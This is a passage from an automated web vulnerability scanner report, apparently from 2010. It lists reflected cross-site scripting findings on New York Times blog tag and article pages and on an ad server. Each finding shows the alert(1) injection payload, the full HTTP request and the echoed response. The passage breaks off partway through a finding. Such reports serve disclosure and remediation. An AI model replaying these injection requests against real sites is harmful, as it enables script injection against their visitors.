The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71b07"><script>alert(1)</script>db7048b06c8 was submitted in the REST URL parameter 2. This input was echoed as 71b07\"><script>alert(1)</script>db7048b06c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/james-levine71b07"><script>alert(1)</script>db7048b06c8/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/james-levine71b07\"><script>alert(1)</script>db7048b06c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/kanye-west/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14892"><script>alert(1)</script>f62c755879a was submitted in the REST URL parameter 2. This input was echoed as 14892\"><script>alert(1)</script>f62c755879a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/kanye-west14892"><script>alert(1)</script>f62c755879a/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/kanye-west14892\"><script>alert(1)</script>f62c755879a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/matt-lauer/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a44"><script>alert(1)</script>7a33a3a08b8 was submitted in the REST URL parameter 2. This input was echoed as d3a44\"><script>alert(1)</script>7a33a3a08b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/matt-lauerd3a44"><script>alert(1)</script>7a33a3a08b8/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/matt-lauerd3a44\"><script>alert(1)</script>7a33a3a08b8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/metropolitan-opera/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72636"><script>alert(1)</script>fe25915fda2 was submitted in the REST URL parameter 2. This input was echoed as 72636\"><script>alert(1)</script>fe25915fda2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/metropolitan-opera72636"><script>alert(1)</script>fe25915fda2/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/metropolitan-opera72636\"><script>alert(1)</script>fe25915fda2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/rubicon/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df76"><script>alert(1)</script>36a7ef473d7 was submitted in the REST URL parameter 2. This input was echoed as 8df76\"><script>alert(1)</script>36a7ef473d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/rubicon8df76"><script>alert(1)</script>36a7ef473d7/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/rubicon8df76\"><script>alert(1)</script>36a7ef473d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/the-nutcracker-chronicles/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d81"><script>alert(1)</script>c72ce13dac8 was submitted in the REST URL parameter 2. This input was echoed as c8d81\"><script>alert(1)</script>c72ce13dac8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/the-nutcracker-chroniclesc8d81"><script>alert(1)</script>c72ce13dac8/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/the-nutcracker-chroniclesc8d81\"><script>alert(1)</script>c72ce13dac8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/today/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2b9"><script>alert(1)</script>a5cf14ef85b was submitted in the REST URL parameter 2. This input was echoed as de2b9\"><script>alert(1)</script>a5cf14ef85b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/todayde2b9"><script>alert(1)</script>a5cf14ef85b/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58241
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/todayde2b9\"><script>alert(1)</script>a5cf14ef85b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/tony-scott/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759e8"><script>alert(1)</script>ffce1e028bf was submitted in the REST URL parameter 2. This input was echoed as 759e8\"><script>alert(1)</script>ffce1e028bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/tony-scott759e8"><script>alert(1)</script>ffce1e028bf/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/tony-scott759e8\"><script>alert(1)</script>ffce1e028bf&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/unstoppable/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ebc"><script>alert(1)</script>69d455abf66 was submitted in the REST URL parameter 2. This input was echoed as 57ebc\"><script>alert(1)</script>69d455abf66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/unstoppable57ebc"><script>alert(1)</script>69d455abf66/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/unstoppable57ebc\"><script>alert(1)</script>69d455abf66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/week-in-culture-pictures/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46998"><script>alert(1)</script>93dbc148a41 was submitted in the REST URL parameter 2. This input was echoed as 46998\"><script>alert(1)</script>93dbc148a41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/week-in-culture-pictures46998"><script>alert(1)</script>93dbc148a41/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58488
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/week-in-culture-pictures46998\"><script>alert(1)</script>93dbc148a41&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://atwar.blogs.nytimes.com |
Path: |
/2010/11/12/the-state-of-schools-in-swat/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810f2"><script>alert(1)</script>3ec6b036ff6 was submitted in the src parameter. This input was echoed as 810f2\"><script>alert(1)</script>3ec6b036ff6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-state-of-schools-in-swat/?src=twr810f2"><script>alert(1)</script>3ec6b036ff6 HTTP/1.1 Host: atwar.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:59:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://atwar.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... SIDE&query=qstring&keywords=Iraq+War;Afghanistan+War;Baghdad;Kandahar;Kabul;Pakistan;Swat+Valley;U.S.+military;troops;Taliban;Al+Qaeda;Shiite;Sunni+and+Kurd;af-pak;education;girls;pakistan;swat&src=twr810f2\"><script>alert(1)</script>3ec6b036ff6"> ...[SNIP]...
|
3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bits.blogs.nytimes.com |
Path: |
/2010/11/12/facebook-to-start-an-e-mail-service/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720b9"><script>alert(1)</script>0cd621483e2 was submitted in the src parameter. This input was echoed as 720b9\"><script>alert(1)</script>0cd621483e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/facebook-to-start-an-e-mail-service/?src=twr720b9"><script>alert(1)</script>0cd621483e2 HTTP/1.1 Host: bits.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:59:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://bits.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 73004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Technology;Start-Ups;Internet;Enterprise;Gadgets;company-news;e-mail;facebook;internet;social-networking&src=twr720b9\"><script>alert(1)</script>0cd621483e2"> ...[SNIP]...
|
3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/adServer.bs |
Issue detail
The value of the h request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 550d0%3balert(1)//2f013fc219c was submitted in the h parameter. This input was echoed as 550d0;alert(1)//2f013fc219c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250550d0%3balert(1)//2f013fc219c&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Connection: close Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Vary: Accept-Encoding Content-Length: 1939
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... </IMG>");var ebO = new Object();ebO.w=300;ebO.h=250550d0;alert(1)//2f013fc219c;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452/Type-11/4 ...[SNIP]...
|
3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/adServer.bs |
Issue detail
The value of the w request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 416d8%3balert(1)//ad7018bc358 was submitted in the w parameter. This input was echoed as 416d8;alert(1)//ad7018bc358 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
